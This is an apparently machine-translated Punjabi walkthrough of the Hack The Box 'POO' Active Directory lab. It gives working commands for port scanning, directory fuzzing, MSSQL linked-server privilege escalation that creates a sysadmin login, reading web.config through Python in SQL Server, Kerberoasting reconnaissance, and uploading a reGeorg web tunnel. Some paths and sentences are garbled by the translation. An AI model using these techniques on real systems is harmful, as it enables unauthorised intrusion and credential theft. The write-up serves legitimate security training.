HackTheBoxendgame. ਪ੍ਰਯੋਗਸ਼ਾਲਾ ਪ੍ਰੋਫੈਸ਼ਨਲ ਅਪਮਾਨਜਨਕ ਕਾਰਵਾਈਆਂ ਦਾ ਬੀਤਣਾ। ਪੈਂਟਸਟ ਐਕਟਿਵ ਡਾਇਰੈਕਟਰੀ

ਇਸ ਲੇਖ ਵਿੱਚ, ਅਸੀਂ ਸਾਈਟ ਤੋਂ ਸਿਰਫ਼ ਇੱਕ ਮਸ਼ੀਨ ਹੀ ਨਹੀਂ, ਸਗੋਂ ਇੱਕ ਪੂਰੀ ਮਿੰਨੀ-ਪ੍ਰਯੋਗਸ਼ਾਲਾ ਦੇ ਬੀਤਣ ਦਾ ਵਿਸ਼ਲੇਸ਼ਣ ਕਰਾਂਗੇ। ਹੈਕ ਬਾਕਸ.

ਜਿਵੇਂ ਕਿ ਵਰਣਨ ਵਿੱਚ ਦੱਸਿਆ ਗਿਆ ਹੈ, POO ਨੂੰ ਇੱਕ ਛੋਟੇ ਐਕਟਿਵ ਡਾਇਰੈਕਟਰੀ ਵਾਤਾਵਰਨ ਵਿੱਚ ਹਮਲਿਆਂ ਦੇ ਸਾਰੇ ਪੜਾਵਾਂ 'ਤੇ ਹੁਨਰਾਂ ਦੀ ਜਾਂਚ ਕਰਨ ਲਈ ਤਿਆਰ ਕੀਤਾ ਗਿਆ ਹੈ। ਟੀਚਾ ਇੱਕ ਉਪਲਬਧ ਹੋਸਟ ਨਾਲ ਸਮਝੌਤਾ ਕਰਨਾ, ਵਿਸ਼ੇਸ਼ ਅਧਿਕਾਰਾਂ ਨੂੰ ਵਧਾਉਣਾ, ਅਤੇ ਅੰਤ ਵਿੱਚ ਪ੍ਰਕਿਰਿਆ ਵਿੱਚ 5 ਫਲੈਗ ਇਕੱਠੇ ਕਰਕੇ ਪੂਰੇ ਡੋਮੇਨ ਨਾਲ ਸਮਝੌਤਾ ਕਰਨਾ ਹੈ।

ਪ੍ਰਯੋਗਸ਼ਾਲਾ ਨਾਲ ਕੁਨੈਕਸ਼ਨ VPN ਰਾਹੀਂ ਹੈ। ਇਹ ਸਿਫ਼ਾਰਸ਼ ਕੀਤੀ ਜਾਂਦੀ ਹੈ ਕਿ ਕੰਮ ਕਰ ਰਹੇ ਕੰਪਿਊਟਰ ਜਾਂ ਕਿਸੇ ਹੋਸਟ ਤੋਂ ਜਿੱਥੇ ਤੁਹਾਡੇ ਲਈ ਮਹੱਤਵਪੂਰਨ ਡੇਟਾ ਹੋਵੇ, ਤੋਂ ਕਨੈਕਟ ਨਾ ਕਰੋ, ਕਿਉਂਕਿ ਤੁਸੀਂ ਉਹਨਾਂ ਲੋਕਾਂ ਦੇ ਨਾਲ ਇੱਕ ਨਿੱਜੀ ਨੈੱਟਵਰਕ ਵਿੱਚ ਆਉਂਦੇ ਹੋ ਜੋ ਜਾਣਕਾਰੀ ਸੁਰੱਖਿਆ ਬਾਰੇ ਕੁਝ ਜਾਣਦੇ ਹਨ 🙂

ਸੰਗਠਨਾਤਮਕ ਜਾਣਕਾਰੀ
ਤਾਂ ਜੋ ਤੁਸੀਂ ਨਵੇਂ ਲੇਖਾਂ, ਸੌਫਟਵੇਅਰ ਅਤੇ ਹੋਰ ਜਾਣਕਾਰੀ ਬਾਰੇ ਪਤਾ ਲਗਾ ਸਕੋ, ਮੈਂ ਬਣਾਇਆ ਹੈ ਟੈਲੀਗ੍ਰਾਮ ਵਿੱਚ ਚੈਨਲ и ਕਿਸੇ ਵੀ ਮੁੱਦੇ 'ਤੇ ਚਰਚਾ ਕਰਨ ਲਈ ਸਮੂਹ IIKB ਦੇ ਖੇਤਰ ਵਿੱਚ. ਤੁਹਾਡੀਆਂ ਨਿੱਜੀ ਬੇਨਤੀਆਂ, ਸਵਾਲ, ਸੁਝਾਅ ਅਤੇ ਸਿਫ਼ਾਰਸ਼ਾਂ ਵੀ ਮੈਂ ਇੱਕ ਨਜ਼ਰ ਮਾਰਾਂਗਾ ਅਤੇ ਸਾਰਿਆਂ ਨੂੰ ਜਵਾਬ ਦਿਆਂਗਾ।.

ਸਾਰੀ ਜਾਣਕਾਰੀ ਕੇਵਲ ਵਿਦਿਅਕ ਉਦੇਸ਼ਾਂ ਲਈ ਪ੍ਰਦਾਨ ਕੀਤੀ ਜਾਂਦੀ ਹੈ। ਇਸ ਦਸਤਾਵੇਜ਼ ਦਾ ਲੇਖਕ ਇਸ ਦਸਤਾਵੇਜ਼ ਦਾ ਅਧਿਐਨ ਕਰਨ ਦੇ ਨਤੀਜੇ ਵਜੋਂ ਪ੍ਰਾਪਤ ਕੀਤੇ ਗਿਆਨ ਅਤੇ ਤਰੀਕਿਆਂ ਦੀ ਵਰਤੋਂ ਕਰਨ ਦੇ ਨਤੀਜੇ ਵਜੋਂ ਕਿਸੇ ਨੂੰ ਹੋਏ ਨੁਕਸਾਨ ਲਈ ਕੋਈ ਜ਼ਿੰਮੇਵਾਰੀ ਨਹੀਂ ਲੈਂਦਾ।

intro

ਇਸ ਐਂਡਗੇਮ ਵਿੱਚ ਦੋ ਮਸ਼ੀਨਾਂ ਹਨ ਅਤੇ ਇਸ ਵਿੱਚ 5 ਝੰਡੇ ਹਨ।

ਉਪਲਬਧ ਹੋਸਟ ਦਾ ਵੇਰਵਾ ਅਤੇ ਪਤਾ ਵੀ ਦਿੱਤਾ ਗਿਆ ਹੈ।

ਚੱਲੀਏ!

ਰੀਕਨ ਫਲੈਗ

ਇਸ ਮਸ਼ੀਨ ਦਾ 10.13.38.11 ਦਾ IP ਪਤਾ ਹੈ ਜੋ ਮੈਂ /etc/hosts ਵਿੱਚ ਜੋੜਦਾ ਹਾਂ।
10.13.38.11 poo.htb

ਪਹਿਲਾ ਕਦਮ ਓਪਨ ਪੋਰਟਾਂ ਨੂੰ ਸਕੈਨ ਕਰਨਾ ਹੈ। ਕਿਉਂਕਿ nmap ਨਾਲ ਸਾਰੀਆਂ ਪੋਰਟਾਂ ਨੂੰ ਸਕੈਨ ਕਰਨ ਵਿੱਚ ਲੰਬਾ ਸਮਾਂ ਲੱਗਦਾ ਹੈ, ਮੈਂ ਇਸਨੂੰ ਪਹਿਲਾਂ masscan ਨਾਲ ਕਰਾਂਗਾ. ਅਸੀਂ 0pps 'ਤੇ tun500 ਇੰਟਰਫੇਸ ਤੋਂ ਸਾਰੀਆਂ TCP ਅਤੇ UDP ਪੋਰਟਾਂ ਨੂੰ ਸਕੈਨ ਕਰਦੇ ਹਾਂ।

sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500

ਹੁਣ, ਪੋਰਟਾਂ 'ਤੇ ਚੱਲਣ ਵਾਲੀਆਂ ਸੇਵਾਵਾਂ ਬਾਰੇ ਵਧੇਰੇ ਵਿਸਤ੍ਰਿਤ ਜਾਣਕਾਰੀ ਪ੍ਰਾਪਤ ਕਰਨ ਲਈ, -A ਵਿਕਲਪ ਨਾਲ ਇੱਕ ਸਕੈਨ ਚਲਾਓ।

nmap -A poo.htb -p80,1433

ਇਸ ਤਰ੍ਹਾਂ, ਸਾਡੇ ਕੋਲ IIS ਅਤੇ MSSQL ਸੇਵਾਵਾਂ ਹਨ। ਇਸ ਸਥਿਤੀ ਵਿੱਚ, ਅਸੀਂ ਡੋਮੇਨ ਅਤੇ ਕੰਪਿਊਟਰ ਦਾ ਅਸਲ DNS ਨਾਮ ਲੱਭਾਂਗੇ। ਵੈੱਬ ਸਰਵਰ 'ਤੇ, ਸਾਨੂੰ IIS ਹੋਮ ਪੇਜ ਦੁਆਰਾ ਸੁਆਗਤ ਕੀਤਾ ਜਾਂਦਾ ਹੈ।

ਚਲੋ ਡਾਇਰੈਕਟਰੀਆਂ ਉੱਤੇ ਦੁਹਰਾਈਏ। ਮੈਂ ਇਸ ਲਈ ਗੋਬਸਟਰ ਦੀ ਵਰਤੋਂ ਕਰਦਾ ਹਾਂ. ਪੈਰਾਮੀਟਰਾਂ ਵਿੱਚ ਅਸੀਂ ਸਟ੍ਰੀਮਾਂ ਦੀ ਸੰਖਿਆ 128 (-t), URL (-u), ਸ਼ਬਦਕੋਸ਼ (-w) ਅਤੇ ਐਕਸਟੈਂਸ਼ਨਾਂ ਦੀ ਗਿਣਤੀ ਨੂੰ ਨਿਸ਼ਚਿਤ ਕਰਦੇ ਹਾਂ ਜੋ ਸਾਡੀ ਦਿਲਚਸਪੀ (-x) ਹਨ।

gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html

ਇਸ ਤਰ੍ਹਾਂ, ਸਾਡੇ ਕੋਲ /admin ਡਾਇਰੈਕਟਰੀ ਲਈ HTTP ਪ੍ਰਮਾਣਿਕਤਾ ਹੈ, ਨਾਲ ਹੀ .DS_Store ਡੈਸਕਟਾਪ ਸੇਵਾ ਸਟੋਰੇਜ ਫਾਈਲ ਉਪਲਬਧ ਹੈ। .DS_Store ਉਹ ਫਾਈਲਾਂ ਹਨ ਜੋ ਇੱਕ ਫੋਲਡਰ ਲਈ ਉਪਭੋਗਤਾ ਸੈਟਿੰਗਾਂ ਨੂੰ ਸਟੋਰ ਕਰਦੀਆਂ ਹਨ, ਜਿਵੇਂ ਕਿ ਫਾਈਲਾਂ ਦੀ ਸੂਚੀ, ਆਈਕਨ ਟਿਕਾਣਾ, ਚੁਣੀ ਗਈ ਪਿਛੋਕੜ ਚਿੱਤਰ। ਅਜਿਹੀ ਫਾਈਲ ਵੈਬ ਡਿਵੈਲਪਰਾਂ ਦੀ ਵੈਬ ਸਰਵਰ ਡਾਇਰੈਕਟਰੀ ਵਿੱਚ ਖਤਮ ਹੋ ਸਕਦੀ ਹੈ। ਇਸ ਤਰ੍ਹਾਂ, ਸਾਨੂੰ ਡਾਇਰੈਕਟਰੀ ਦੀ ਸਮੱਗਰੀ ਬਾਰੇ ਜਾਣਕਾਰੀ ਮਿਲਦੀ ਹੈ। ਇਸ ਦੇ ਲਈ ਤੁਸੀਂ ਵਰਤ ਸਕਦੇ ਹੋ DS_Store ਕ੍ਰਾਲਰ.

python3 dsstore_crawler.py -i http://poo.htb/

ਸਾਨੂੰ ਡਾਇਰੈਕਟਰੀ ਦੀ ਸਮੱਗਰੀ ਮਿਲਦੀ ਹੈ. ਇੱਥੇ ਸਭ ਤੋਂ ਦਿਲਚਸਪ ਗੱਲ ਹੈ /dev ਡਾਇਰੈਕਟਰੀ, ਜਿਸ ਤੋਂ ਅਸੀਂ ਸਰੋਤ ਅਤੇ db ਫਾਈਲਾਂ ਨੂੰ ਦੋ ਸ਼ਾਖਾਵਾਂ ਵਿੱਚ ਦੇਖ ਸਕਦੇ ਹਾਂ। ਪਰ ਅਸੀਂ ਫਾਈਲ ਅਤੇ ਡਾਇਰੈਕਟਰੀ ਨਾਮਾਂ ਦੇ ਪਹਿਲੇ 6 ਅੱਖਰਾਂ ਦੀ ਵਰਤੋਂ ਕਰ ਸਕਦੇ ਹਾਂ ਜੇਕਰ ਸੇਵਾ IIS ShortName ਲਈ ਕਮਜ਼ੋਰ ਹੈ। ਤੁਸੀਂ ਵਰਤ ਕੇ ਇਸ ਕਮਜ਼ੋਰੀ ਦੀ ਜਾਂਚ ਕਰ ਸਕਦੇ ਹੋ IIS ਛੋਟਾ ਨਾਮ ਸਕੈਨਰ.

ਅਤੇ ਸਾਨੂੰ ਇੱਕ ਟੈਕਸਟ ਫਾਈਲ ਮਿਲਦੀ ਹੈ ਜੋ "poo_co" ਨਾਲ ਸ਼ੁਰੂ ਹੁੰਦੀ ਹੈ। ਇਹ ਨਹੀਂ ਜਾਣਦਾ ਕਿ ਅੱਗੇ ਕੀ ਕਰਨਾ ਹੈ, ਮੈਂ ਸਿਰਫ਼ ਡਾਇਰੈਕਟਰੀਆਂ ਦੇ ਡਿਕਸ਼ਨਰੀ ਵਿੱਚੋਂ ਉਹ ਸਾਰੇ ਸ਼ਬਦ ਚੁਣੇ ਹਨ ਜੋ "co" ਨਾਲ ਸ਼ੁਰੂ ਹੁੰਦੇ ਹਨ।

cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt

ਅਤੇ wfuzz ਨਾਲ ਦੁਹਰਾਓ।

wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404

ਅਤੇ ਸਹੀ ਸ਼ਬਦ ਲੱਭੋ! ਅਸੀਂ ਇਸ ਫਾਈਲ ਨੂੰ ਦੇਖਦੇ ਹਾਂ, ਪ੍ਰਮਾਣ ਪੱਤਰਾਂ ਨੂੰ ਸੁਰੱਖਿਅਤ ਕਰਦੇ ਹਾਂ (DBNAME ਪੈਰਾਮੀਟਰ ਦੁਆਰਾ ਨਿਰਣਾ ਕਰਦੇ ਹੋਏ, ਉਹ MSSQL ਤੋਂ ਹਨ)।

ਅਸੀਂ ਝੰਡੇ ਨੂੰ ਸੌਂਪਦੇ ਹਾਂ, ਅਤੇ ਅਸੀਂ 20% ਅੱਗੇ ਵਧਦੇ ਹਾਂ।

ਹਹ ਝੰਡਾ

ਅਸੀਂ MSSQL ਨਾਲ ਜੁੜਦੇ ਹਾਂ, ਮੈਂ DBeaver ਦੀ ਵਰਤੋਂ ਕਰਦਾ ਹਾਂ.

ਸਾਨੂੰ ਇਸ ਡੇਟਾਬੇਸ ਵਿੱਚ ਕੁਝ ਵੀ ਦਿਲਚਸਪ ਨਹੀਂ ਮਿਲਦਾ, ਆਓ ਇੱਕ SQL ਸੰਪਾਦਕ ਬਣਾਉ ਅਤੇ ਜਾਂਚ ਕਰੀਏ ਕਿ ਉਪਭੋਗਤਾ ਕੀ ਹਨ।

SELECT name FROM master..syslogins;

ਸਾਡੇ ਕੋਲ ਦੋ ਉਪਭੋਗਤਾ ਹਨ। ਆਓ ਆਪਣੇ ਵਿਸ਼ੇਸ਼ ਅਧਿਕਾਰਾਂ ਦੀ ਜਾਂਚ ਕਰੀਏ।

SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');

ਇਸ ਤਰ੍ਹਾਂ, ਕੋਈ ਵਿਸ਼ੇਸ਼ ਅਧਿਕਾਰ ਨਹੀਂ ਹਨ. ਆਓ ਲਿੰਕ ਕੀਤੇ ਸਰਵਰਾਂ ਨੂੰ ਵੇਖੀਏ, ਮੈਂ ਇਸ ਤਕਨੀਕ ਬਾਰੇ ਵਿਸਥਾਰ ਵਿੱਚ ਲਿਖਿਆ ਹੈ ਇੱਥੇ.

SELECT * FROM master..sysservers;

ਇਸ ਲਈ ਅਸੀਂ ਇੱਕ ਹੋਰ SQL ਸਰਵਰ ਲੱਭਦੇ ਹਾਂ. ਚਲੋ openquery() ਦੀ ਵਰਤੋਂ ਕਰਕੇ ਇਸ ਸਰਵਰ ਉੱਤੇ ਕਮਾਂਡਾਂ ਦੇ ਐਗਜ਼ੀਕਿਊਸ਼ਨ ਦੀ ਜਾਂਚ ਕਰੀਏ।

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');

ਅਤੇ ਅਸੀਂ ਇੱਕ ਸਵਾਲ ਦਾ ਰੁੱਖ ਵੀ ਬਣਾ ਸਕਦੇ ਹਾਂ।

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');

ਤੱਥ ਇਹ ਹੈ ਕਿ ਜਦੋਂ ਅਸੀਂ ਇੱਕ ਲਿੰਕ ਕੀਤੇ ਸਰਵਰ ਨੂੰ ਬੇਨਤੀ ਕਰਦੇ ਹਾਂ, ਤਾਂ ਬੇਨਤੀ ਨੂੰ ਕਿਸੇ ਹੋਰ ਉਪਭੋਗਤਾ ਦੇ ਸੰਦਰਭ ਵਿੱਚ ਚਲਾਇਆ ਜਾਂਦਾ ਹੈ! ਆਓ ਦੇਖੀਏ ਕਿ ਅਸੀਂ ਲਿੰਕ ਕੀਤੇ ਸਰਵਰ 'ਤੇ ਕਿਹੜੇ ਉਪਭੋਗਤਾ ਸੰਦਰਭ ਨੂੰ ਚਲਾ ਰਹੇ ਹਾਂ।

SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');

ਅਤੇ ਹੁਣ ਆਓ ਦੇਖੀਏ ਕਿ ਲਿੰਕ ਕੀਤੇ ਸਰਵਰ ਤੋਂ ਸਾਡੇ ਲਈ ਬੇਨਤੀ ਨੂੰ ਕਿਸ ਸੰਦਰਭ ਵਿੱਚ ਲਾਗੂ ਕੀਤਾ ਜਾਂਦਾ ਹੈ!

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');

ਇਸ ਤਰ੍ਹਾਂ, ਇਹ ਇੱਕ DBO ਸੰਦਰਭ ਹੈ ਜਿਸ ਵਿੱਚ ਸਾਰੇ ਵਿਸ਼ੇਸ਼ ਅਧਿਕਾਰ ਹੋਣੇ ਚਾਹੀਦੇ ਹਨ। ਆਓ ਲਿੰਕ ਕੀਤੇ ਸਰਵਰ ਤੋਂ ਬੇਨਤੀ ਦੇ ਮਾਮਲੇ ਵਿੱਚ ਵਿਸ਼ੇਸ਼ ਅਧਿਕਾਰਾਂ ਦੀ ਜਾਂਚ ਕਰੀਏ।

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');

ਜਿਵੇਂ ਕਿ ਤੁਸੀਂ ਦੇਖ ਸਕਦੇ ਹੋ, ਸਾਡੇ ਕੋਲ ਸਾਰੇ ਵਿਸ਼ੇਸ਼ ਅਧਿਕਾਰ ਹਨ! ਆਓ ਆਪਣਾ ਐਡਮਿਨ ਇਸ ਤਰ੍ਹਾਂ ਬਣਾਈਏ। ਪਰ ਉਹ ਉਹਨਾਂ ਨੂੰ ਓਪਨਕਵੇਰੀ ਦੁਆਰਾ ਨਹੀਂ ਹੋਣ ਦਿੰਦੇ, ਆਓ ਇਸਨੂੰ ਐਗਜ਼ੀਕਿਊਟ ਏਟੀ ਦੁਆਰਾ ਕਰੀਏ।

EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";

ਅਤੇ ਹੁਣ ਅਸੀਂ ਨਵੇਂ ਉਪਭੋਗਤਾ ਦੇ ਪ੍ਰਮਾਣ ਪੱਤਰਾਂ ਨਾਲ ਜੁੜਦੇ ਹਾਂ, ਨਵੇਂ ਫਲੈਗ ਡੇਟਾਬੇਸ ਦੀ ਪਾਲਣਾ ਕਰਦੇ ਹਾਂ.

ਅਸੀਂ ਇਸ ਝੰਡੇ ਨੂੰ ਸੌਂਪ ਕੇ ਅੱਗੇ ਵਧਦੇ ਹਾਂ।

ਪਿੱਛੇ ਦਾ ਝੰਡਾ

ਚਲੋ MSSQL ਦੀ ਵਰਤੋਂ ਕਰਕੇ ਸ਼ੈੱਲ ਪ੍ਰਾਪਤ ਕਰੀਏ, ਮੈਂ ਇੰਪੈਕੇਟ ਪੈਕੇਜ ਤੋਂ mssqlclient ਦੀ ਵਰਤੋਂ ਕਰ ਰਿਹਾ ਹਾਂ.

mssqlclient.py ralf:[email protected] -db POO_PUBLIC

ਸਾਨੂੰ ਪਾਸਵਰਡ ਪ੍ਰਾਪਤ ਕਰਨ ਦੀ ਲੋੜ ਹੈ, ਅਤੇ ਪਹਿਲੀ ਚੀਜ਼ ਜੋ ਅਸੀਂ ਪਹਿਲਾਂ ਹੀ ਮਿਲ ਚੁੱਕੇ ਹਾਂ ਉਹ ਹੈ ਸਾਈਟ. ਇਸ ਤਰ੍ਹਾਂ, ਸਾਨੂੰ ਇੱਕ ਵੈਬ ਸਰਵਰ ਸੰਰਚਨਾ ਦੀ ਲੋੜ ਹੈ (ਅਸੀਂ ਇੱਕ ਸੁਵਿਧਾਜਨਕ ਸ਼ੈੱਲ ਨਹੀਂ ਸੁੱਟ ਸਕਦੇ, ਜ਼ਾਹਰ ਹੈ ਕਿ ਫਾਇਰਵਾਲ ਕੰਮ ਕਰ ਰਿਹਾ ਹੈ)।

ਪਰ ਪਹੁੰਚ ਤੋਂ ਇਨਕਾਰ ਕਰ ਦਿੱਤਾ ਗਿਆ ਹੈ। ਹਾਲਾਂਕਿ ਅਸੀਂ MSSQL ਤੋਂ ਫਾਈਲ ਨੂੰ ਪੜ੍ਹ ਸਕਦੇ ਹਾਂ, ਸਾਨੂੰ ਸਿਰਫ ਇਹ ਜਾਣਨ ਦੀ ਜ਼ਰੂਰਤ ਹੈ ਕਿ ਕਿਹੜੀਆਂ ਪ੍ਰੋਗਰਾਮਿੰਗ ਭਾਸ਼ਾਵਾਂ ਕੌਂਫਿਗਰ ਕੀਤੀਆਂ ਗਈਆਂ ਹਨ। ਅਤੇ MSSQL ਡਾਇਰੈਕਟਰੀ ਵਿੱਚ ਸਾਨੂੰ ਪਤਾ ਚਲਦਾ ਹੈ ਕਿ ਪਾਈਥਨ ਹੈ।

ਫਿਰ web.config ਫਾਈਲ ਨੂੰ ਪੜ੍ਹਨ ਲਈ ਕੋਈ ਸਮੱਸਿਆ ਨਹੀਂ ਹੈ.

EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"

ਮਿਲੇ ਪ੍ਰਮਾਣ ਪੱਤਰਾਂ ਦੇ ਨਾਲ, /admin 'ਤੇ ਜਾਓ ਅਤੇ ਝੰਡਾ ਚੁੱਕੋ।

ਪੈਰ ਰੱਖਣ ਦਾ ਝੰਡਾ

ਵਾਸਤਵ ਵਿੱਚ, ਇੱਕ ਫਾਇਰਵਾਲ ਦੀ ਵਰਤੋਂ ਕਰਨ ਵਿੱਚ ਕੁਝ ਅਸੁਵਿਧਾਵਾਂ ਹਨ, ਪਰ ਨੈਟਵਰਕ ਸੈਟਿੰਗਾਂ ਨੂੰ ਦੇਖਦੇ ਹੋਏ, ਅਸੀਂ ਦੇਖਿਆ ਹੈ ਕਿ IPv6 ਪ੍ਰੋਟੋਕੋਲ ਵੀ ਵਰਤਿਆ ਜਾਂਦਾ ਹੈ!

ਇਸ ਪਤੇ ਨੂੰ /etc/hosts ਵਿੱਚ ਸ਼ਾਮਲ ਕਰੋ।
dead:babe::1001 poo6.htb
ਚਲੋ ਹੋਸਟ ਨੂੰ ਦੁਬਾਰਾ ਸਕੈਨ ਕਰੀਏ, ਪਰ ਇਸ ਵਾਰ IPv6 ਉੱਤੇ।

ਅਤੇ WinRM ਸੇਵਾ IPv6 ਉੱਤੇ ਉਪਲਬਧ ਹੈ। ਆਓ ਮਿਲੇ ਪ੍ਰਮਾਣ ਪੱਤਰਾਂ ਨਾਲ ਜੁੜੀਏ।

ਡੈਸਕਟੌਪ 'ਤੇ ਇੱਕ ਝੰਡਾ ਹੈ, ਇਸ ਨੂੰ ਫੜੋ.

P00 ਵਾਲਾ ਝੰਡਾ

ਦੇ ਨਾਲ ਮੇਜ਼ਬਾਨ 'ਤੇ reconnaissance ਬਾਅਦ winpeas ਸਾਨੂੰ ਕੁਝ ਖਾਸ ਨਹੀਂ ਮਿਲਦਾ। ਫਿਰ ਦੁਬਾਰਾ ਪ੍ਰਮਾਣ ਪੱਤਰਾਂ ਦੀ ਖੋਜ ਕਰਨ ਦਾ ਫੈਸਲਾ ਕੀਤਾ ਗਿਆ ਸੀ (ਮੈਂ ਇਸ ਵਿਸ਼ੇ 'ਤੇ ਵੀ ਲਿਖਿਆ ਸੀ ਲੇਖ). ਪਰ ਮੈਂ WinRM ਰਾਹੀਂ ਸਿਸਟਮ ਤੋਂ ਸਾਰੇ SPN ਪ੍ਰਾਪਤ ਨਹੀਂ ਕਰ ਸਕਿਆ।

setspn.exe -T intranet.poo -Q */*

ਚਲੋ ਕਮਾਂਡ ਨੂੰ MSSQL ਰਾਹੀਂ ਚਲਾਉਂਦੇ ਹਾਂ।

ਇਸ ਤਰ੍ਹਾਂ, ਸਾਨੂੰ p00_hr ਅਤੇ p00_adm ਉਪਭੋਗਤਾਵਾਂ ਦਾ SPN ਮਿਲਦਾ ਹੈ, ਜਿਸਦਾ ਮਤਲਬ ਹੈ ਕਿ ਉਹ ਕਰਬਰੋਸਟਿੰਗ ਵਰਗੇ ਹਮਲੇ ਲਈ ਕਮਜ਼ੋਰ ਹਨ। ਸੰਖੇਪ ਵਿੱਚ, ਅਸੀਂ ਉਹਨਾਂ ਦੇ ਪਾਸਵਰਡ ਦੇ ਹੈਸ਼ ਪ੍ਰਾਪਤ ਕਰ ਸਕਦੇ ਹਾਂ।

ਪਹਿਲਾਂ ਤੁਹਾਨੂੰ MSSQL ਉਪਭੋਗਤਾ ਦੀ ਤਰਫੋਂ ਇੱਕ ਸਥਿਰ ਸ਼ੈੱਲ ਪ੍ਰਾਪਤ ਕਰਨ ਦੀ ਲੋੜ ਹੈ। ਪਰ ਕਿਉਂਕਿ ਅਸੀਂ ਪਹੁੰਚ ਵਿੱਚ ਸੀਮਤ ਹਾਂ, ਸਾਡੇ ਕੋਲ ਸਿਰਫ਼ 80 ਅਤੇ 1433 ਪੋਰਟਾਂ ਰਾਹੀਂ ਹੋਸਟ ਨਾਲ ਸੰਪਰਕ ਹੈ। ਪਰ ਪੋਰਟ 80 ਦੁਆਰਾ ਆਵਾਜਾਈ ਨੂੰ ਸੁਰੰਗ ਕਰਨਾ ਸੰਭਵ ਹੈ! ਇਸਦੇ ਲਈ ਅਸੀਂ ਵਰਤਾਂਗੇ ਅਗਲੀ ਐਪਲੀਕੇਸ਼ਨ. ਆਉ tunnel.aspx ਫਾਈਲ ਨੂੰ ਵੈਬ ਸਰਵਰ ਦੀ ਹੋਮ ਡਾਇਰੈਕਟਰੀ ਵਿੱਚ ਅਪਲੋਡ ਕਰੀਏ - C: inetpubwwwroot.

ਪਰ ਜਦੋਂ ਅਸੀਂ ਇਸਨੂੰ ਐਕਸੈਸ ਕਰਨ ਦੀ ਕੋਸ਼ਿਸ਼ ਕਰਦੇ ਹਾਂ, ਸਾਨੂੰ ਇੱਕ 404 ਗਲਤੀ ਮਿਲਦੀ ਹੈ। ਇਸਦਾ ਮਤਲਬ ਹੈ ਕਿ *.aspx ਫਾਈਲਾਂ ਨੂੰ ਚਲਾਇਆ ਨਹੀਂ ਜਾਂਦਾ ਹੈ। ਇਹਨਾਂ ਐਕਸਟੈਂਸ਼ਨਾਂ ਨਾਲ ਫਾਈਲਾਂ ਨੂੰ ਚਲਾਉਣ ਲਈ, ASP.NET 4.5 ਨੂੰ ਹੇਠਾਂ ਦਿੱਤੇ ਅਨੁਸਾਰ ਸਥਾਪਿਤ ਕਰੋ।

dism /online /enable-feature /all /featurename:IIS-ASPNET45

ਅਤੇ ਹੁਣ, tunnel.aspx ਨੂੰ ਐਕਸੈਸ ਕਰਨ ਵੇਲੇ, ਸਾਨੂੰ ਜਵਾਬ ਮਿਲਦਾ ਹੈ ਕਿ ਸਭ ਕੁਝ ਜਾਣ ਲਈ ਤਿਆਰ ਹੈ।

ਆਉ ਐਪਲੀਕੇਸ਼ਨ ਦਾ ਕਲਾਇੰਟ ਹਿੱਸਾ ਸ਼ੁਰੂ ਕਰੀਏ, ਜੋ ਟ੍ਰੈਫਿਕ ਨੂੰ ਰੀਲੇਅ ਕਰੇਗਾ। ਅਸੀਂ ਪੋਰਟ 5432 ਤੋਂ ਸਾਰੇ ਟ੍ਰੈਫਿਕ ਨੂੰ ਸਰਵਰ 'ਤੇ ਭੇਜਾਂਗੇ।

python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx

ਅਤੇ ਅਸੀਂ ਆਪਣੀ ਪ੍ਰੌਕਸੀ ਰਾਹੀਂ ਕਿਸੇ ਵੀ ਐਪਲੀਕੇਸ਼ਨ ਦੇ ਟ੍ਰੈਫਿਕ ਨੂੰ ਭੇਜਣ ਲਈ ਪ੍ਰੌਕਸੀਚੇਨ ਦੀ ਵਰਤੋਂ ਕਰਦੇ ਹਾਂ। ਆਉ ਇਸ ਪ੍ਰੌਕਸੀ ਨੂੰ /etc/proxychains.conf ਸੰਰਚਨਾ ਫਾਇਲ ਵਿੱਚ ਜੋੜੀਏ।

